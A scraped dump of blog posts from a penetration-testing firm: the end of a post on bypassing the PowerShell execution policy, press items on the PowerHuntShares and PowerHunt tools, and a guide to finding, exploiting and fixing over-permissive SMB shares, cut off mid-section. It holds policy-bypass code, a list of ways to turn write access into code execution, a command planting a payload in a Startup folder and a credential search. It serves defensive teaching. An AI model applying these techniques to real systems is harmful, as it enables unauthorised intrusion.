function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))} 

Disable-ExecutionPolicy
.\runme.ps1

13. Set the ExecutionPolicy for the Process Scope

As we saw in the introduction, the execution policy can be applied at many levels, including the process level, which you have control over. Using this technique, the execution policy is relaxed for the duration of your session only. It does not result in a persistent configuration change or require writing to the disk.

Set-ExecutionPolicy Bypass -Scope Process

14. Set the ExecutionPolicy for the CurrentUser Scope via Command

This option is similar to the process scope, but applies the setting to the current user's environment persistently by modifying a registry key. Unlike the process scope, it does result in a configuration change, but it does not require writing a script to the disk.

Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted

15. Set the ExecutionPolicy for the CurrentUser Scope via the Registry

In this example, I've shown how to change the execution policy for the current user's environment persistently by modifying the registry key below directly.

HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
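The edit can be made in one line from a PowerShell console. A minimal sketch, assuming the "ExecutionPolicy" value under that key holds the setting:

```powershell
# Write the ExecutionPolicy value directly under the current user's hive.
# Roughly equivalent to Set-ExecutionPolicy -Scope CurrentUser, without the cmdlet.
Set-ItemProperty -Path "HKCU:\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell" -Name ExecutionPolicy -Value Unrestricted
```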

Wrap Up

I think the theme here is that the execution policy doesn’t have to be a hurdle for developers, admins, or penetration testers. Microsoft never intended it to be a security control, which is why there are so many options for bypassing it. Microsoft was nice enough to provide some native options, and the security community has also come up with some really fun tricks. Thanks to all of those people who have contributed through blogs and presentations. To the rest, good luck in all your PowerShell adventures and don't forget to hack responsibly. ;)

Looking for a strategic partner to critically test your Windows systems? Explore NetSPI’s network penetration testing services.


[post_title] => 15 Ways to Bypass the PowerShell Execution Policy [post_excerpt] => By default, PowerShell is configured to prevent the execution of PowerShell scripts on Windows systems. In this blog I’ll cover 15 ways to bypass the PowerShell execution policy without having local administrator rights on the system. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => 15-ways-to-bypass-the-powershell-execution-policy [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:09:58 [post_modified_gmt] => 2023-01-23 21:09:58 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1107 [menu_order] => 162 [post_type] => post [post_mime_type] => [comment_count] => 23 [filter] => raw ) [8] => WP_Post Object ( [ID] => 28916 [post_author] => 17 [post_date] => 2022-11-29 15:15:00 [post_date_gmt] => 2022-11-29 21:15:00 [post_content] =>

On November 29, both Vice President of Research, Scott Sutherland and Nick Landers, were featured in the VMblog article called 18 Security Leaders Come Together to Share Their 2023 Predictions. Read the preview below or view it online.

+++

What will the New Year bring in cyberspace? Here's a roundup of some of the top security industry forecasts, trends and cybersecurity predictions for 2023. Where do things go from here?

Read on as 18 industry leaders in the security space come together to provide their insights into how the cybersecurity industry will shake out in 2023.

NetSPI: Scott Sutherland, VP of Research - Can DLT Help Stop Software Supply Chain Attacks? 

"Adoption of distributed ledger technology (DTL) is still in its infancy and we'll see some interesting use cases gain momentum in 2023. DLT can basically be used as a database that enforces security through cryptographic keys and signatures. Since the stored data is immutable, DTL can be used anytime you need a high integrity source of truth. That comes in handy when trying to ensure the security of open-source projects (and maybe some commercial ones). Over the last few years, there have been several "supply chain compromises'' that boil down to an unauthorized code submission. In response to those attacks, many software providers have started to bake more security reviews and audit controls into their SDLC process. Additionally, the companies consuming software have beefed up their requirements for adopting/deploying 3rd party software in their environment. However neither really solves the core issue, which is that anyone with administrative access to the systems hosting the code repository can bypass the intended controls. DLT could be a solution to that problem."

+++

NetSPI: Nick Landers, VP of Research - By the end of next year every major financial institution will have announced adoption of Blockchain technology

"There is a notable trend of Blockchain adoption in large financial institutions. The primary focus is custodial offerings of digital assets, and private chains to maintain and execute trading contracts. The business use cases for Blockchain technology will deviate starkly from popularized tokens and NFTs. Instead, industries will prioritize private chains to accelerate business logic, digital asset ownership on behalf of customers, and institutional investment in Proof of Stake chains. 

By the end of next year, I would expect every major financial institution will have announced adoption of Blockchain technology, if they haven't already. Nuanced technologies like Hyperledger Fabric have received much less security research than Ethereum, EVM, and Solidity-based smart contracts. Additionally, the supported features in business-focused private chain technologies differ significantly from their public counterparts. This ultimately means more attack surface, more potential configuration mistakes, and more required training for development teams. If you thought that blockchain was "secure by default", think again. Just like cloud platform adoption, the promises of "secure by default" will fall away as unique attack paths and vulnerabilities are discovered in the nuances of this tech."

You can read the full article at VMblog!

[post_title] => VMBlog: 18 Security Leaders Come Together to Share Their 2023 Predictions [post_excerpt] => On November 29, VPs of Research, Scott Sutherland and Nick Landers, were featured in the VMblog article called 18 Security Leaders Come Together to Share Their 2023 Predictions. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => vmblog-security-leaders-share-2023-predictions [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:01 [post_modified_gmt] => 2023-01-23 21:10:01 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28916 [menu_order] => 169 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [9] => WP_Post Object ( [ID] => 28201 [post_author] => 17 [post_date] => 2022-08-10 16:32:00 [post_date_gmt] => 2022-08-10 21:32:00 [post_content] =>

On August 10, NetSPI Senior Director Scott Sutherland was featured in the Dark Reading article called New Open Source Tools Launched for Adversary Simulation. Read the preview below or view it online.

+++

Network shares in Active Directory environments configured with excessive permissions pose serious risks to the enterprise in the form of data exposure, privilege escalation, and ransomware attacks. Two new open source adversary simulation tools PowerHuntShares and PowerHunt help enterprise defenders discover vulnerable network shares and manage the attack surface.

The tools will help defense, identity and access management (IAM), and security operations center (SOC) teams streamline share hunting and remediation of excessive SMB share permissions in Active Directory environments, NetSPI's senior director Scott Sutherland wrote on the company blog. Sutherland developed these tools.

PowerHuntShares inventories, analyzes, and reports excessive privilege assigned to SMB shares on Active Directory domain joined computers. The PowerHuntShares tool addresses the risks of excessive share permissions in Active Directory environments that can lead to data exposure, privilege escalation, and ransomware attacks within enterprise environments.

"PowerHuntShares will inventory SMB share ACLs configured with 'excessive privileges' and highlight 'high risk' ACLs [access control lists]," Sutherland wrote.

PowerHunt, a modular threat hunting framework, identifies signs of compromise based on artifacts from common MITRE ATT&CK techniques and detects anomalies and outliers specific to the target environment. The tool automates the collection of artifacts at scale using PowerShell remoting and performs initial analysis. 

You can read the full article at Dark Reading!

[post_title] => Dark Reading: New Open Source Tools Launched for Adversary Simulation [post_excerpt] => On August 10, NetSPI Senior Director Scott Sutherland was featured in the Dark Reading article called New Open Source Tools Launched for Adversary Simulation. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => dark-reading-open-source-tools-for-adversary-simulation [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:21 [post_modified_gmt] => 2023-01-23 21:10:21 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28201 [menu_order] => 218 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [10] => WP_Post Object ( [ID] => 28194 [post_author] => 17 [post_date] => 2022-08-10 12:56:00 [post_date_gmt] => 2022-08-10 17:56:00 [post_content] =>

On August 10, NetSPI Senior Director Scott Sutherland was featured in the Open Source For You article called New Open Source Tools From NetSPI Address Information Security Issues. Read the preview below or view it online.

+++

Two new open source solutions for identity and access management (IAM) and security operations centre (SOC) groups have been made available by NetSPI, a business that specialises in enterprise penetration testing and attack surface management. Information security teams will benefit from these tools, PowerHuntShares and PowerHunt, which will help them find weak network shares and enhance detections in general.

PowerHuntShares intends to lessen the problems created by excessive powers in corporate systems, such as data disclosure, privilege escalation, and ransomware assaults. On Active Directory domain-joined PCs, the programme detects, examines, and reports excessive share permissions linked to their respective SMB shares.

A modular threat hunting platform called PowerHunt finds dangers in a variety of target contexts as well as target-specific oddities and outliers. This detection is based on artefacts from popular MITRE ATT&CK techniques. The collection of these artefacts is automated using PowerShell remoting, and initial analysis is then performed. Along with other tools and procedures, PowerHunt also creates simple-to-use .csv files for improved triage and analysis.

“I’m proud to work for an organization that understands the importance of open-source tool development and encourages innovation through collaboration,” said Scott Sutherland, senior director at NetSPI. “I urge the security community to check out and contribute to these tools so we can better understand our SMB share attack surfaces and improve strategies for remediation, together.”

[post_title] => Open Source For You: New Open Source Tools From NetSPI Address Information Security Issues [post_excerpt] => On August 10, NetSPI Senior Director Scott Sutherland was featured in the Open Source For You article called New Open Source Tools From NetSPI Address Information Security Issues. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => open-source-for-you-new-open-source-tools-address-information-security-issues [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:21 [post_modified_gmt] => 2023-01-23 21:10:21 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28194 [menu_order] => 219 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [11] => WP_Post Object ( [ID] => 28195 [post_author] => 17 [post_date] => 2022-08-10 09:28:00 [post_date_gmt] => 2022-08-10 14:28:00 [post_content] =>

On August 10, NetSPI Senior Director Scott Sutherland was featured in the Help Net Security article called NetSPI unveils two open-source tools to assist defence teams in uncovering vulnerable network shares. Read the preview below or view it online.

+++

At Black Hat USA 2022, NetSPI unveiled two new open-source tools for the information security community: PowerHuntShares and PowerHunt.

These new adversary simulation tools were developed by NetSPI’s Senior Director, Scott Sutherland, to help defense, identity and access management (IAM), and security operations center (SOC) teams discover vulnerable network shares and improve detections.

  • PowerHuntShares inventories, analyzes, and reports excessive privilege assigned to SMB shares on Active Directory domain joined computers. This capability helps address the risks of excessive share permissions in Active Directory environments that can lead to data exposure, privilege escalation, and ransomware attacks within enterprise environments.
  • PowerHunt, a modular threat hunting framework, identifies signs of compromise based on artifacts from common MITRE ATT&CK techniques and detects anomalies and outliers specific to the target environment. PowerHunt automates the collection of artifacts at scale using PowerShell remoting and performs initial analysis. It can also output easy-to-consume .csv files so that additional triage and analysis can be done using other tools and processes.

“I’m proud to work for an organization that understands the importance of open-source tool development and encourages innovation through collaboration,” said Scott. “I urge the security community to check out and contribute to these tools so we can better understand our SMB share attack surfaces and improve strategies for remediation, together.”

[post_title] => Help Net Security: NetSPI unveils two open-source tools to assist defence teams in uncovering vulnerable network shares [post_excerpt] => On August 10, NetSPI Senior Director Scott Sutherland was featured in the Help Net Security article called NetSPI unveils two open-source tools to assist defence teams in uncovering vulnerable network shares. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => help-net-security-open-source-tools [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:22 [post_modified_gmt] => 2023-01-23 21:10:22 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28195 [menu_order] => 220 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [12] => WP_Post Object ( [ID] => 28196 [post_author] => 17 [post_date] => 2022-08-09 13:06:00 [post_date_gmt] => 2022-08-09 18:06:00 [post_content] =>

On August 9, NetSPI Senior Director Scott Sutherland was featured in the Database Trends and Applications article called NetSPI’s Latest Open-Source Tools Confront Information Security Issues. Read the preview below or view it online.

+++

NetSPI, an enterprise penetration testing and attack surface management company, is releasing two new open-source tools for identity and access management (IAM) and security operations center (SOC) groups. These tools, PowerHuntShares and PowerHunt, will help information security teams discover vulnerable network shares and improve detections overall.

PowerHuntShares aims to alleviate the pains of data exposure, privilege escalation, and ransomware attacks in company systems caused by excessive privileges. The tool inventories, analyzes, and reports excessive share permissions associated with SMB shares on Active Directory domain-joined computers.

PowerHunt is a modular threat hunting framework that locates risks across target environments and identifies target-specific anomalies and outliers. Detection is based on artifacts from prevalent MITRE ATT&CK techniques, whose collection is automated using PowerShell remoting before initial analysis is performed. PowerHunt also produces easy-to-consume .csv files for further triage and analysis with other tools and processes.

“I’m proud to work for an organization that understands the importance of open-source tool development and encourages innovation through collaboration,” said Scott Sutherland, senior director at NetSPI. “I urge the security community to check out and contribute to these tools so we can better understand our SMB share attack surfaces and improve strategies for remediation, together.”

For more information, please visit https://www.netspi.com/.

[post_title] => Database Trends and Applications: NetSPI’s Latest Open-Source Tools Confront Information Security Issues [post_excerpt] => On August 9, NetSPI Senior Director Scott Sutherland was featured in the Database Trends and Applications called NetSPI’s Latest Open-Source Tools Confront Information Security Issues. Read the preview below or view it online. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => open-source-tools-confront-information-security-issues [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:22 [post_modified_gmt] => 2023-01-23 21:10:22 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28196 [menu_order] => 222 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [13] => WP_Post Object ( [ID] => 28193 [post_author] => 17 [post_date] => 2022-08-09 12:21:00 [post_date_gmt] => 2022-08-09 17:21:00 [post_content] =>

On August 9, NetSPI Senior Director Scott Sutherland was featured in the VentureBeat article called NetSPI rolls out 2 new open-source pen-testing tools at Black Hat. Read the preview below or view it online.

+++

Preventing and mitigating cyberattacks is a massive day-to-day, sometimes hour-to-hour, endeavor for enterprises. New, more advanced techniques are revealed constantly, especially with the rise of ransomware-as-a-service, crime syndicates and cybercrime commoditization. Likewise, the statistics are seemingly endless, with a regular churn of new and updated reports and research studies revealing worsening conditions. 

According to Fortune Business Insights, the worldwide information security market will reach roughly $376 billion by 2029. And IBM research revealed that the average cost of a data breach is $4.35 million.

The harsh truth is that many organizations are exposed due to common software, hardware or organizational process vulnerabilities — and 93% of all networks are open to breaches, according to another recent report.

Cybersecurity must therefore be a team effort, said Scott Sutherland, senior director at NetSPI, which specializes in enterprise penetration testing and attack-surface management. 

New open-source discovery and remediation tools

The company today announced the release of two new open-source tools for the information security community: PowerHuntShares and PowerHunt. Sutherland is demoing both at Black Hat USA this week. 

These new tools are aimed at helping defense, identity and access management (IAM) and security operations center (SOC) teams discover vulnerable network shares and improve detections, said Sutherland. 

They have been developed — and released in an open-source capacity — to “help ensure our penetration testers and the IT community can more effectively identify and remediate excessive share permissions that are being abused by bad actors like ransomware groups,” said Sutherland. 

He added, “They can be used as part of a regular quarterly cadence, but the hope is they’ll be a starting point for companies that lacked awareness around these issues before the tools were released.” 

Vulnerabilities revealed (by the good guys)

The new PowerHuntShares capability inventories, analyzes and reports excessive privilege assigned to server message block (SMB) shares on Microsoft’s Active Directory (AD) domain-joined computers. 

SMB allows applications on a computer to read and write to files and to request services from server programs in a computer network.

NetSPI’s new tool helps address risks of excessive share permissions in AD environments that can lead to data exposure, privilege escalation and ransomware attacks within enterprise environments, explained Sutherland. 

“PowerHuntShares is focused on identifying shares configured with excessive permissions and providing data insight to understand how they are related to each other, when they were introduced into the environment, who owns them and how exploitable they are,” said Sutherland. 

For instance, according to a recent study from cybersecurity company ExtraHop, SMB was the most prevalent protocol exposed in many industries: 34 out of 10,000 devices in financial services; seven out of 10,000 devices in healthcare; and five out of 10,000 devices in state, local and education (SLED).

You can read the full article at VentureBeat!

[post_title] => VentureBeat: NetSPI rolls out 2 new open-source pen-testing tools at Black Hat [post_excerpt] => On August 9, NetSPI Senior Director Scott Sutherland was featured in the VentureBeat article called NetSPI rolls out 2 new open-source pen-testing tools at Black Hat. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => venturebeat-new-open-source-pentesting-tools [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:23 [post_modified_gmt] => 2023-01-23 21:10:23 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28193 [menu_order] => 223 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [14] => WP_Post Object ( [ID] => 28175 [post_author] => 17 [post_date] => 2022-08-09 08:00:00 [post_date_gmt] => 2022-08-09 13:00:00 [post_content] =>

Introduction 

In this blog, I’ll explain how to quickly inventory, exploit, and remediate network shares configured with excessive permissions at scale in Active Directory environments. Excessive share permissions represent a risk that can lead to data exposure, privilege escalation, and ransomware attacks within enterprise environments. So, I’ll also be exploring why network shares configured with excessive permissions are still plaguing most environments after 20 years of mainstream vulnerability management and penetration testing.

Finally, I’ll share a new open-source tool called PowerHuntShares that can help streamline share hunting and remediation of excessive SMB share permissions in Active Directory environments. This content is also available in a presentation format here. Or, if you’d like to hear me talk about this topic, check out our webinar, How to Evaluate Active Directory SMB Shares at Scale.

This should be interesting to people responsible for managing network share access in Active Directory environments (Identity and access management/IAM teams) and the red team/penetration testers tasked with exploiting that access. 

TLDR; We can leverage Active Directory to help create an inventory of systems and shares. Shares configured with excessive permissions can lead to remote code execution (RCE) in a variety of ways, remediation efforts can be expedited through simple data grouping techniques, and malicious share scanning can be detected with a few common event IDs and a little correlation (always easier said than done).

Table of Contents: 

The Problem(s)
Network Share Permissions Inheritance Blind Spots
Network Share Inventory
Network Share Exploitation
Network Share Remediation
Introducing PowerHuntShares
Wrap Up

The Problem(s) 

If only it were just one problem. I don’t know a penetration tester that doesn’t have a war story involving unauthorized network share access. In the real world, that story typically ends with the deployment of ransomware and double extortion. That’s why it’s important we try to understand some of the root causes behind this issue. Below is a summary of the root causes that often lead to massive network share exposure in most Active Directory environments. 

Broken Asset Management 

Tracking live systems in enterprise environments is difficult, and tracking an ever-changing share inventory and its owners is even more difficult. Even if the Identity and Access Management (IAM) team finds a network share through discovery, it raises the questions:

  1. Who owns it?
  2. What applications or business processes does it support?
  3. Can we remove high risk Access Control Entries (ACE)?
  4. Can we remove the share altogether?

Most of those questions can be answered if you have a functioning Configuration Management Database (CMDB). Unfortunately, not everyone does.

Broken Vulnerability Management 

Many vulnerability management programs were never built to identify network share configurations that provide unauthorized access to authenticated domain users. Much of their focus has been on identifying classic vulnerabilities (missing patches, weak passwords, and application issues) and prioritizing efforts around vulnerabilities that don’t require authentication, which is of course not all bad.

However, based on my observations, the industry has only taken a deep interest in the Active Directory ecosystem in the last five years. This seems to be largely due to increased exposure and awareness of Active Directory (AD) attacks which are heavily dependent on configurations and not missing patches.

I’m also not saying IAM teams haven’t been working hard to do their jobs, but in many cases, they get bogged down in what equates to group management and forget to (or don’t have time to) look at the actual assets that global/common groups have access to. That is a deep well, but today’s focus is on the network shares.

Penetration testers have always known shares are a risk, but implementing, managing, and evaluating least privilege in Active Directory environments is a non-trivial challenge. Even with increased interest in the security community, very few solutions can effectively inventory and evaluate share access for an entire Active Directory domain (or multiple domains). 

Based on my experience, very few organizations perform authenticated vulnerability scans to begin with, but even those that do seem to lack findings for common excessive privileges, inherited permissions, and distilled summary data for the environment that provides the insights that most IAM teams need to make good decisions. There has been an overreliance on those types of tools for a long time because many companies have the impression that they provide more coverage than they do regarding network share permissions. 

In short, good asset inventory and attack surface management paves the way for better vulnerability management coverage – and many companies aren’t quite there yet. 

Not Considering Segmentation Boundaries 

Most large environments have host, network, and Active Directory domain boundaries that need to be considered when performing any type of authenticated scanning or agent deployment. Companies trying to accurately inventory and evaluate network shares often miss things because they do not consider the boundaries isolating their assets. Make sure to work within those boundaries when evaluating assets. 

The Cloud is Here!

The cloud is here, and it supports all kinds of fantastic file storage mediums, but that doesn’t mean that on premise network shares disappear. Companies need to make sure they are still looking backward as they continue to look forward regarding security controls on file shares. For many companies, it may be the better part of a decade before they can migrate the bulk of their file storage infrastructure into their favorite floating mass of condensed water vapor – you know, the cloud. 😜

Misunderstanding NTFS and Share Permissions 

There are a lot of bad practices related to share permission management that have gotten absorbed into IT culture over the years simply because people don’t understand how they work. One of the biggest contributors to excessive share permissions is privilege inheritance through native nested group memberships. This issue is not limited to network shares either. We have been abusing the same privilege inheritance issues for over a decade to get access to SQL Server Instances. In the next sections, I’ll provide an overview of the issue and how it can be exploited in the context of network shares.

Network Share Permissions Inheritance Blind Spots 

A network share is just a medium for making local files available to remote users on the network, but two sets of permissions control a remote user’s access to the shared files. To understand the privilege inheritance problem, it helps to do a quick refresher on how NTFS and share permissions work together on Windows systems. Let’s explore the basics. 

NTFS Permissions 

  • Used to control access to the local NTFS file system 
  • Can affect local and remote users 

Share Permissions 

  • Used to control access to shared files and folders 
  • Only affects remote users 

In short, from a remote user perspective, network share permissions (remote) are reviewed first, then NTFS permissions (local) are reviewed second, but the most restrictive permission always wins regardless. Below is a simple example showing that John has Full Control permissions on the share, but only Read permissions on the associated local folder. Most restrictive wins, so John is only provided read access to the files made available remotely through the shared folder.

A diagram of NTFS Permissions and Share Permissions showcasing that the most restrictive permission wins.
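The interaction above can be verified directly with built-in cmdlets. Below is a minimal sketch, run locally on the file server; the share name and account are hypothetical:

```powershell
# Compare share permissions and NTFS permissions for a single user.
# Get-SmbShareAccess, Get-SmbShare, and Get-Acl are built-in Windows cmdlets.
$shareName = "FileShare1"   # hypothetical share
$account   = "DEMO\John"    # hypothetical domain user

# Remote (share) permissions
Get-SmbShareAccess -Name $shareName | Where-Object { $_.AccountName -eq $account }

# Local (NTFS) permissions on the underlying folder
$path = (Get-SmbShare -Name $shareName).Path
(Get-Acl -Path $path).Access | Where-Object { $_.IdentityReference -eq $account }

# The effective access for a remote user is the most restrictive of the two results.
```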

So those are the basics. The big idea being that the most restrictive ACL wins. However, there are some nuances that have to do with local groups that inherit Domain Groups. To get our heads around that, let’s touch briefly on the affected local groups. 

Everyone

The Everyone group provides all authenticated and anonymous users with access in most configurations. This group is overused in many environments and often results in excessive privilege. 

Builtin\Users 

New local users are added to this group by default. When the system is not joined to a domain, the group behaves as you would expect it to. 

Authenticated Users

This group is nested in the Builtin\Users group. When a system is not joined to the domain, it doesn’t do much in the way of influencing access. However, when a system is joined to an Active Directory domain, Authenticated Users implicitly includes the “Domain Users” and “Domain Computers” groups. For example, an IT administrator may think they’re only providing remote share access to the Builtin\Users group, when in fact they are giving it to everyone on the domain. Below is a diagram to help illustrate this scenario.

Builtin\Users group includes Domain Users when domain joined.
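You can confirm this nesting on any domain-joined host with one built-in cmdlet (available in Windows PowerShell 5.1 and later):

```powershell
# List the members nested in the local Users group. On a domain-joined system,
# this typically includes NT AUTHORITY\Authenticated Users, which implicitly
# includes the Domain Users and Domain Computers groups.
Get-LocalGroupMember -Group "Users"
```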

The lesson here is that a small misunderstanding around local and domain group relationships can lead to unauthorized access and potential risk. The next section will cover how to inventory shares and their Access-Control Lists (ACLs) so we can target and remediate them.

Network Share Inventory 

As it turns out, getting a quick inventory of your domain computers and associated shares isn’t that hard thanks to several native and open-source tools. The trick is to grab enough information to answer those who, what, where, when, and how questions needed for remediation efforts.
The discovery of shares and permissions boils down to a few basic steps: 

  1. Query Active Directory via Lightweight Directory Access Protocol (LDAP) to get a list of domain computers. PowerShell commands like Get-AdComputer (Active Directory PowerShell Module) and Get-DomainComputer (PowerSploit) can help a lot there.
  2. Confirm connectivity to those computers on TCP port 445. Nmap is a free and easy-to-use tool for this purpose. There are also several open-source TCP port scanning scripts out there if you want to stick with PowerShell.
  3. Query for shares, share permissions, and other information using your preferred method. PowerShell tools like Get-SMBShare, Get-SmbShareAccess, Get-ACL, and Get-ObjectAcl (PowerSploit) are quite helpful.
  4. Other information that will help remediation efforts later includes the folder owner, file count, file listing, file listing hash, and computer IP address. You may also find some of that information in your company’s CMDB. PowerShell commands like Get-ChildItem and Resolve-DnsName can also help gather some of that information.

PowerHuntShares can be used to automate the tasks above (covered in the last section), but regardless of what you use for discovery, understanding how unauthorized share access can be abused will help your team prioritize remediation efforts.

Network Share Exploitation 

Network shares configured with excessive permissions can be exploited in several ways, but the nature of the share and specific share permissions will ultimately dictate which attacks can be executed. Below, I’ve provided an overview of some of the most common attacks that leverage read and write access to shares to help get you started. 

Read Access Abuse 

Ransomware and other threat actors often leverage excessive read permissions on shares to access sensitive data like Personal Identifiable Information (PII) or intellectual property (source code, engineering designs, investment strategies, proprietary formulas, acquisition information, etc.) that they can exploit, sell, or extort your company with. Additionally, we have found during penetration tests that passwords are commonly stored in cleartext and can be used to log into databases and servers. This means that in some cases, read access to a share can end in RCE.

Below is a simple example of how excessive read access to a network share can result in RCE: 

  1. The attacker compromises a domain user.
  2. The attacker identifies a shared folder for a web root, code backup, or dev ops directory.
  3. The attacker identifies passwords (often database connection strings) stored in cleartext.
  4. The attacker uses the database password to connect to the database server.
  5. The attacker uses the native database functionality to obtain local administrative privileges to the database server’s operating system.
  6. The attacker leverages shared database service account to access other database servers. 

Below is a simple illustration of that process: 

A 6-step process of how excessive read access to a network share can result in remote code execution (RCE).
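Step 3 in the chain above is often as simple as a recursive string search across the readable share. A minimal sketch, using a hypothetical UNC path:

```powershell
# Search a readable share for likely cleartext credentials such as
# database connection strings. File extensions and patterns are examples only.
Get-ChildItem -Path "\\server\webroot" -Recurse `
    -Include *.config,*.ini,*.ps1,*.bat,*.txt -ErrorAction SilentlyContinue |
    Select-String -Pattern 'password\s*=', 'pwd\s*=' |
    Select-Object Path, LineNumber, Line
```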

Write Access Abuse 

Write access provides all the benefits of read access with the bonus of being able to add, remove, modify, and encrypt files (like Ransomware threat actors). Write access also offers more potential to turn share access into RCE. Below is a list of ten of the more common RCE options: 

  1. Write a web shell to a web root folder, which can be accessed via the web server.
  2. Replace or modify application EXE and DLL files to include a backdoor.
  3. Write EXE or DLL files to paths used by applications and services that are unquoted.
  4. Write a DLL to application folders to perform DLL hijacking. You can use Koppeling, written by NetSPI’s very own Director of Research Nick Landers.
  5. Write a DLL and config file to application folders to perform appdomain hijacking for .net applications.
  6. Write an executable or script to the “All Users” Startup folder to launch them at the next logon.
  7. Modify files executed by scheduled tasks.
  8. Modify the PowerShell startup profile to include a backdoor.
  9. Modify Microsoft office templates to include a backdoor.
  10. Write a malicious LNK file to capture or relay the NetNTLM hashes. 
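As a concrete illustration of option 6 above, a single copy operation is enough to stage code execution at the next interactive logon. The target name and payload are hypothetical, and this applies to authorized testing only:

```powershell
# Write an executable to the "All Users" Startup folder via a writable C$ share;
# Windows launches everything in this folder when any user logs on.
$startup = "\\target\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
Copy-Item -Path .\payload.exe -Destination $startup
```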

You may have noticed that many of the techniques I listed are also commonly used for persistence and lateral movement, which is a great reminder that old techniques can have more than one use case. 

Below is a simple diagram that attempts to illustrate the basic web shell example.

  1. The attacker compromises a domain user.
  2. The attacker scans for shares, finds a wwwroot directory, and uploads a web shell. The wwwroot directory stores all the files used by the web application hosted on the target IIS server. So, you can think of the web shell as something that extends the functionality of the published web application.
  3. Using a standard web browser, the attacker can now access the uploaded web shell file hosted by the target IIS web server.
  4. The attacker uses the web shell access to execute commands on the operating systems as the web server service account.
  5. The web server service account may have additional privileges to access other resources on the network.
A 5-step diagram showing RCE using a web shell.

Below is another simplified diagram showing the generic steps that can be used to execute the attacks from my top 10 list. Pay attention to the C$ share being abused. The C$ share is a default hidden share in Windows that should not be accessible to standard domain users. It maps to the C drive, which typically includes all the files on the system. Unfortunately, DevOps processes, application deployments, and individual user misconfigurations accidentally (or intentionally) make the C$ share available to all domain users in more environments than you might think. During our penetration tests, we perform full SMB share audits of domain-joined systems, and we have found that we end up with write access to a C$ share more than half the time.

A simplified diagram based on the list of 10 common remote code execution (RCE) options.
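Checking whether your current domain user has unintended access to a C$ share takes one line; anything other than an access-denied error is worth investigating (the target name is hypothetical):

```powershell
# A successful directory listing here means the hidden C$ share is exposed
# to the current domain user.
Get-ChildItem -Path "\\target\C$" -ErrorAction Stop
```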

Network Share Remediation 

Tracking down system owners, applications, and valid business cases during excessive share remediation efforts can be a huge pain for IAM teams. For a large business, it can mean sorting through hundreds of thousands of share ACLs. So having ways to group and prioritize shares during that effort can be a huge time saver. 

I’ve found that the trick to successful grouping is collecting the right data. To determine what data to collect, I ask myself the standard who, what, where, when, and how questions and then determine where I may be able to get that data from there. 

What shares are exposed? 

  • Share Name: Sometimes, the share name alone can indicate the type of data exposed including high risk shares like C$, ADMIN$, and wwwroot.
  • Share File Count: File counts can help prioritize remediation; for example, shares containing no files can often be deprioritized (or simply removed) when you’re trying to address high-risk shares first.
  • Directory List: Similar to share name, the folders and files in a shared directory can often tell you a lot about context.
  • Directory List Hash: This is simply a hash of the directory listing. While not a hard requirement, it can make identifying and comparing directory listings that are the same a little easier. 
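The directory list hash mentioned above can be computed from a normalized (sorted) listing so that identical shares produce identical hashes. A minimal sketch, with a hypothetical share path:

```powershell
# Hash a sorted directory listing so shares with identical content group together.
$listing = (Get-ChildItem -Path "\\server\share" -ErrorAction SilentlyContinue |
            Sort-Object Name | Select-Object -ExpandProperty Name) -join "`n"
$sha256  = [System.Security.Cryptography.SHA256]::Create()
$hash    = [System.BitConverter]::ToString(
               $sha256.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($listing))
           ) -replace '-', ''
$hash
```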

Who has access to them? 

  • Share ACL: This will help show what access users have and can be filtered for known high-risk groups or large internal groups.
  • NTFS ACL: This will help show what access users have and can be filtered for known high-risk groups or large internal groups. 
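Filtering share ACLs for large, high-risk principals is straightforward with the SMB cmdlets. A sketch, run locally on a file server; extend the list with domain-specific groups like "DOMAIN\Domain Users" as needed:

```powershell
# Flag share ACEs granted to broad groups that can effectively mean
# "everyone on the domain" once a system is domain joined.
$broadGroups = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')
Get-SmbShare | ForEach-Object { Get-SmbShareAccess -Name $_.Name } |
    Where-Object { $broadGroups -contains $_.AccountName }
```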

When were they created? 

  • Folder Creation Date: Grouping or clustering creation dates on a timeline can reveal trends that can be tied to business units, applications, and processes that may have introduced excessive share privileges in the past. 
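Those creation-date trends can be surfaced by bucketing shared-folder timestamps by month. A sketch, run locally on a file server:

```powershell
# Group shared-folder creation dates by month to reveal bulk-creation events
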